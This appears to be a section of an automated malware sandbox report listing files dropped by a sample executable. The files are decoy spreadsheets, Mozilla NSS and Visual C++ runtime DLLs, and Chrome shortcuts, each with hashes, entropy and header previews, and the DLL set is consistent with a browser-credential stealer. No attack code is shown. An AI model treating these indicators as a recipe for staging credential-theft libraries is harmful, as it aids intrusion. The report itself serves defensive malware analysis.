Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6998645060098685
Encrypted:	false
SSDEEP:	24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
MD5:	1676F91570425F6566A5746BC8E8427E
SHA1:	0F922133E2BEF0B48C623BEFA0C77361F6FA3900
SHA-256:	534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
SHA-512:	07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
Malicious:	false
Preview:	NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

C:\ProgramData\NVWZAPQSQL.xlsx

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6998645060098685
Encrypted:	false
SSDEEP:	24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
MD5:	1676F91570425F6566A5746BC8E8427E
SHA1:	0F922133E2BEF0B48C623BEFA0C77361F6FA3900
SHA-256:	534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
SHA-512:	07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
Malicious:	false
Preview:	NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

C:\ProgramData\PALRGUCVEH.xlsx

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: qa4Ulla1BY.exe, Detection: malicious, Browse Filename: U8uFcjIjAR.exe, Detection: malicious, Browse Filename: JlvRdFpwOD.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 0dN59ZIkEM.exe, Detection: malicious, Browse Filename: 34cFFMVY3B.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: HFtuDDkdi6.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: qa4Ulla1BY.exe, Detection: malicious, Browse Filename: U8uFcjIjAR.exe, Detection: malicious, Browse Filename: JlvRdFpwOD.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 0dN59ZIkEM.exe, Detection: malicious, Browse Filename: 34cFFMVY3B.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: HFtuDDkdi6.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\c4RAHq3BNl.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 23:07:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.972168875444831
Encrypted:	false
SSDEEP:	48:8Sd/T33LHYidAKZdA19ehwiZUklqehYgy+3:8mzSfgy
MD5:	EDE65B4F3C6AB5308073B55E8A3BD0FE
SHA1:	2FC46D079DECD65DF4D7F456D9119AE0BEAB55C1
SHA-256:	EE6E4B3D8B1A1ED17DD8A8B32FF3DBDF2FA9E8115651F2B63743339898371123
SHA-512:	182CC5D3C9DA0A8B447518B6312C45D2EC75CCFF61DE1CAB2E8432CF530460E43F5A2AAF7A41953C58C6E763E3FD463252C936DEF233AE4810812FB29AF054E8
Malicious:	false
Preview:	L..................F.@.. ...$+.,....7......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........P#.w.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 2 23:07:08 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.986195287904686
Encrypted:	false
SSDEEP:	48:85d/T33LHYidAKZdA1weh/iZUkAQkqehPgy+2:8LzI9Qagy
MD5:	BD66A94709468EF31F86E1DAA21891CA
SHA1:	88C2E6CD460DC8CA21F4B6DE439B8611CBFA1760
SHA-256:	19632277032086A4DF490A823CDBC00A52BF95DF5A6E6BFAC6231AD142A8D121
SHA-512:	1B5B8887458E52C9B9D6E7A4FE36040E354885E38AAFF85A21C9A53349A91BB920286172969ADC74BE48AB7D47F4CEEB4641629044DFCECBD84BBFD0AEBCCEC1
Malicious:	false
